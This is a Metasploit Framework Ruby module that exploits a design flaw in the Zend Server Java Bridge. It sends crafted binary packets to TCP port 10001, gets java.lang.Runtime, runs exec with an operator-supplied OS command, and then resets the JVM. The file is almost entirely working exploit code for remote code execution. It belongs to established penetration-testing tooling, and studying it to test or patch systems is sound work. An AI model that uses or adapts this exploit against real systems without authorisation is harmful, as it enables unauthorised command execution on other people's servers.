metasploit-framework/modules/auxiliary/admin/zend/java_bridge.rb

95 lines
2.6 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',
'Description' => %q{
This module abuses a flaw in the Zend Java Bridge Component of
the Zend Server Framework. By sending a specially crafted packet, an
attacker may be able to execute arbitrary code.
NOTE: This module has only been tested with the Win32 build of the software.
},
'Author' => [ 'ikki', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '71420'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/' ],
[ 'EDB', 17078 ],
],
'DisclosureDate' => 'Mar 28 2011'))
register_options(
[
Opt::RPORT(10001),
OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
], self.class)
end
def run
cmd = datastore['CMD']
connect
java_object = [0x33000000].pack('V') + [0x00000000].pack('V')
java_object << [0x0c000000].pack('V') + "CreateObject"
java_object << [0x02000000].pack('V') + [0x00000004].pack('V')
java_object << "\x11" + "java.lang.Runtime" + "\x07"
java_object << [0x00000000].pack('V')
print_status("Creating the Java Object 'java.lang.Runtime'")
sock.put(java_object)
res = sock.get_once() || ''
classid = res[5,4]
runtime = [0x16000000].pack('V') + classid + [0x0a000000].pack('V')
runtime << "getRuntime" + [0x00000000].pack('V')
print_status("Invoking static method 'getRuntime()'")
sock.put(runtime)
res = sock.get_once() || ''
methodid = res[5,4]
exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid
exec << [0x04000000].pack('V') + "exec" + [0x01000000].pack('V')
exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd
print_status("Invoking method 'exec()' with parameter '#{cmd}'")
sock.put(exec)
success = sock.get_once() || ''
if (success =~ /\x00\x00\x00/)
print_status("Cleaning up the JVM")
rm = [0x11000000].pack('V') + [0xffffffff].pack('V')
rm << [0x05000000].pack('V') + "reset"
rm << [0x00000000].pack('V')
sock.put(rm)
else
print_error("Failed to run command...")
disconnect
return
end
disconnect
end
end